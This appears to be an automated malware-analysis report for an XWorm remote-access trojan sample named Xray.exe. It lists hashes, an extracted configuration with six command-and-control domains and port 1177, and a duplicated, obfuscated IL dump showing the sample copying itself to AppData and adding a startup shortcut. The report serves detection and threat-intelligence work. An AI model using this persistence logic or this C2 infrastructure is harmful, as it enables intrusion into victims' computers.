2c26b6f05631d3bccdd211e7dc0486cb
PE Executable | MD5: 2c26b6f05631d3bccdd211e7dc0486cb | Size: 55.3 KB | application/x-dosexec
Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 2c26b6f05631d3bccdd211e7dc0486cb
|
| Sha1 | b43f49f0d5c5c92c90a75c46b81e43670d6a1e97
|
| Sha256 | 70f71d41992900a2ed8e6246ca8a2366f031757b159bcfcb47cfd7ca299ec6b6
|
| Sha384 | a8c475343319c262baeb0d255a5a63278d36ea346fd58c41742ad569da858ebaa25403ec996d0f92fce6dfcebea53531
|
| Sha512 | 2fdb25befe83c87f735798dd092ea241665c51946d152217054749034897c9efb203df9329476f04390ceb3347b58569acc7f0fcd1eef83337764a2767b22145
|
| SSDeep | 768:no9Iuxf+8VUx+N/aHAfVsFq7a4zkPOZ/kbJzBIQ3FxZOdhRVNv:no9nmb+NyHGogkPOhkbJzBIiFxZOdHD
|
| TLSH | F2437D1CBBB5412AD1FE5FB099B2B213C636E2675503D62F28DC40DF2723E89C9416E2
|
PeID
|
Config. Field0 | Value |
|---|---|
| Mutex | gE9xESzegqeoqtdM |
| Hosts | suitingwarriors.org,student56.ru.com,devyus.in.net,mjnd.sa.com,kshxfr.sa.com,nrafth.za.com |
| Port | 1177 |
| KEY | <1234567890> |
| USBNM | <XWormmm> |
| LoggerPath | %AppData% |
| family | xworm |
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | Xray.exe |
| Full Name | Xray.exe |
| EntryPoint | System.Void Stub.kkoXeMeznt0HFTB8BBTOBeK::GPo5jPEM7Cb76VNo6zeSH6H() |
| Scope Name | Xray.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Xray |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 258 |
| Main Method | System.Void Stub.kkoXeMeznt0HFTB8BBTOBeK::GPo5jPEM7Cb76VNo6zeSH6H() |
| Main IL Instruction Count | 212 |
| Main IL | ldsfld System.Int32 RKiuOCPyR7JRmtTdGUa0MPa::736XaPKhrTHFfT7yc0pLKYv ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::Z2ntCNsTsOCkpnFbPfgNYTn call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::Z2ntCNsTsOCkpnFbPfgNYTn ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::z58vthr1aFk4jiME5L6PHdF call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::z58vthr1aFk4jiME5L6PHdF ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::bNrqyGhd21xNtEylfJ7g5cv call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::bNrqyGhd21xNtEylfJ7g5cv ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::0mrUt1x47q6ouVoBAQAWyNP call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::0mrUt1x47q6ouVoBAQAWyNP ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::3nmFgZR59iQFUxTxrsl1QLu call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::3nmFgZR59iQFUxTxrsl1QLu ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::LWgDdnA2eV0ieNp939VnLhE call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::LWgDdnA2eV0ieNp939VnLhE ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::dNOPFXKhJAwvv7zeFM28DVK call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::dNOPFXKhJAwvv7zeFM28DVK ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::ribXKF1NV8Onso4CR8je3ri call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::ribXKF1NV8Onso4CR8je3ri leave.s IL_00CB: call System.Boolean Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::hsaRwnHqzqwXVxmZCkSWLlw2KJeoDgwoeJg3cBEv8ThRvUlP2CB41bByAWujgE2a2VxqM5L9Am7MimthukHiNman() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00CB: call System.Boolean Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::hsaRwnHqzqwXVxmZCkSWLlw2KJeoDgwoeJg3cBEv8ThRvUlP2CB41bByAWujgE2a2VxqM5L9Am7MimthukHiNman() call System.Boolean Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::hsaRwnHqzqwXVxmZCkSWLlw2KJeoDgwoeJg3cBEv8ThRvUlP2CB41bByAWujgE2a2VxqM5L9Am7MimthukHiNman() brtrue.s IL_00D8: ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::dNOPFXKhJAwvv7zeFM28DVK ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::dNOPFXKhJAwvv7zeFM28DVK ldstr \ ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::ribXKF1NV8Onso4CR8je3ri call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_4 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_011A: ldloc.0 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0131: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::10iuHURqqtNGnyWU1dIld7YWN1KbjmK3tsVkAn92k2iboyib4PVlkaYgw9CoDuef7yZXQ69yNZ70bZol2wydFKi6 call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_015C: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_015C: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::ribXKF1NV8Onso4CR8je3ri call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_7 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_9 ldloc.s V_9 ldc.i4.0 <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_9 stloc.s V_10 ldloc.s V_10 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_11 ldloc.s V_11 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_11 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_11 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_01E1: stloc.s V_12 ldloc.s V_10 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_7 stloc.s V_12 ldloc.s V_12 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_13 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_12 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_13 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_12 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_12 ldloc.s V_7 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::ByV60Ely4mKOZUFzTK9ykhsDCNioPd0AqHowqoTZwnqMz6GeLRkn7u5ZezzMLg4DmvHBeteQzfAjvFdzb0lWgCxa leave.s IL_0260: call System.Void Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::DimU2tOdKf4STMP4Lkq4cbpgdU3kwQs5e0jf54hjuq2B87EkF7zOsJB9() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0260: call System.Void Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::DimU2tOdKf4STMP4Lkq4cbpgdU3kwQs5e0jf54hjuq2B87EkF7zOsJB9() call System.Void Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::DimU2tOdKf4STMP4Lkq4cbpgdU3kwQs5e0jf54hjuq2B87EkF7zOsJB9() call System.String Stub.q0d8wXzRlOujJ0vTYZCX9Z5::51xaV2xSpm4YnPouIONOXO7() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0276: ldnull call System.Void Stub.J0T2ajuBcDD678CYbQeYvQGvizNSySVgmuVVztwjzMnFchblFq4SjEFu::SOyULbd4ijYhZuMGi6xAoARhSBAmHh21xShWMW9kUYzOdKbFVw092m4f() ldnull <null> ldftn System.Void Stub.kkoXeMeznt0HFTB8BBTOBeK::mjvC5XW2CBM3gnrmHq7tTsg() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.kkoXeMeznt0HFTB8BBTOBeK::CDvwtDtJL78Fh0zbXFAwEtk() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null> |
| Module Name | Xray.exe |
| Full Name | Xray.exe |
| EntryPoint | System.Void Stub.kkoXeMeznt0HFTB8BBTOBeK::GPo5jPEM7Cb76VNo6zeSH6H() |
| Scope Name | Xray.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Xray |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 258 |
| Main Method | System.Void Stub.kkoXeMeznt0HFTB8BBTOBeK::GPo5jPEM7Cb76VNo6zeSH6H() |
| Main IL Instruction Count | 212 |
| Main IL | ldsfld System.Int32 RKiuOCPyR7JRmtTdGUa0MPa::736XaPKhrTHFfT7yc0pLKYv ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::Z2ntCNsTsOCkpnFbPfgNYTn call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::Z2ntCNsTsOCkpnFbPfgNYTn ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::z58vthr1aFk4jiME5L6PHdF call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::z58vthr1aFk4jiME5L6PHdF ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::bNrqyGhd21xNtEylfJ7g5cv call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::bNrqyGhd21xNtEylfJ7g5cv ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::0mrUt1x47q6ouVoBAQAWyNP call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::0mrUt1x47q6ouVoBAQAWyNP ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::3nmFgZR59iQFUxTxrsl1QLu call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::3nmFgZR59iQFUxTxrsl1QLu ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::LWgDdnA2eV0ieNp939VnLhE call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::LWgDdnA2eV0ieNp939VnLhE ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::dNOPFXKhJAwvv7zeFM28DVK call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::dNOPFXKhJAwvv7zeFM28DVK ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::ribXKF1NV8Onso4CR8je3ri call System.Object Stub.lpoqFpLtFVBQZ1ugcpMIWE9ugG2A7DqpHceEpvNF9VU8wqjPYtzL795O::Yo7zCRuWNXiiOfzejtnU04gNRkWdwuQEqTLkVwQ7zCgK4iFz66dSD1y5(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::ribXKF1NV8Onso4CR8je3ri leave.s IL_00CB: call System.Boolean Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::hsaRwnHqzqwXVxmZCkSWLlw2KJeoDgwoeJg3cBEv8ThRvUlP2CB41bByAWujgE2a2VxqM5L9Am7MimthukHiNman() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00CB: call System.Boolean Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::hsaRwnHqzqwXVxmZCkSWLlw2KJeoDgwoeJg3cBEv8ThRvUlP2CB41bByAWujgE2a2VxqM5L9Am7MimthukHiNman() call System.Boolean Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::hsaRwnHqzqwXVxmZCkSWLlw2KJeoDgwoeJg3cBEv8ThRvUlP2CB41bByAWujgE2a2VxqM5L9Am7MimthukHiNman() brtrue.s IL_00D8: ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::dNOPFXKhJAwvv7zeFM28DVK ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::dNOPFXKhJAwvv7zeFM28DVK ldstr \ ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::ribXKF1NV8Onso4CR8je3ri call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_4 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_011A: ldloc.0 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0131: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::10iuHURqqtNGnyWU1dIld7YWN1KbjmK3tsVkAn92k2iboyib4PVlkaYgw9CoDuef7yZXQ69yNZ70bZol2wydFKi6 call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_015C: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_015C: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String RKiuOCPyR7JRmtTdGUa0MPa::ribXKF1NV8Onso4CR8je3ri call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_7 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_9 ldloc.s V_9 ldc.i4.0 <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_9 stloc.s V_10 ldloc.s V_10 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_11 ldloc.s V_11 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_11 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_11 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_01E1: stloc.s V_12 ldloc.s V_10 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_7 stloc.s V_12 ldloc.s V_12 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_13 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_12 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_13 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_12 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_12 ldloc.s V_7 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::ByV60Ely4mKOZUFzTK9ykhsDCNioPd0AqHowqoTZwnqMz6GeLRkn7u5ZezzMLg4DmvHBeteQzfAjvFdzb0lWgCxa leave.s IL_0260: call System.Void Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::DimU2tOdKf4STMP4Lkq4cbpgdU3kwQs5e0jf54hjuq2B87EkF7zOsJB9() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0260: call System.Void Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::DimU2tOdKf4STMP4Lkq4cbpgdU3kwQs5e0jf54hjuq2B87EkF7zOsJB9() call System.Void Stub.AoIII1jXfEPKeMHHIC97cLMZWXMnkFGTK4ioF3Yi62zLsr1bGx2S5xuE::DimU2tOdKf4STMP4Lkq4cbpgdU3kwQs5e0jf54hjuq2B87EkF7zOsJB9() call System.String Stub.q0d8wXzRlOujJ0vTYZCX9Z5::51xaV2xSpm4YnPouIONOXO7() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0276: ldnull call System.Void Stub.J0T2ajuBcDD678CYbQeYvQGvizNSySVgmuVVztwjzMnFchblFq4SjEFu::SOyULbd4ijYhZuMGi6xAoARhSBAmHh21xShWMW9kUYzOdKbFVw092m4f() ldnull <null> ldftn System.Void Stub.kkoXeMeznt0HFTB8BBTOBeK::mjvC5XW2CBM3gnrmHq7tTsg() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.kkoXeMeznt0HFTB8BBTOBeK::CDvwtDtJL78Fh0zbXFAwEtk() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null> |
|
Name0 | Value |
|---|---|
| Mutex | gE9xESzegqeoqtdM |
| CnC | suitingwarriors.org |
| CnC | student56.ru.com |
| CnC | devyus.in.net |
| CnC | mjnd.sa.com |
| CnC | kshxfr.sa.com |
| CnC | nrafth.za.com |
| Port | 1177 |
|
Config. Field0 | Value |
|---|---|
| Mutex | gE9xESzegqeoqtdM |
| Hosts | suitingwarriors.org,student56.ru.com,devyus.in.net,mjnd.sa.com,kshxfr.sa.com,nrafth.za.com |
| Port | 1177 |
| KEY | <1234567890> |
| USBNM | <XWormmm> |
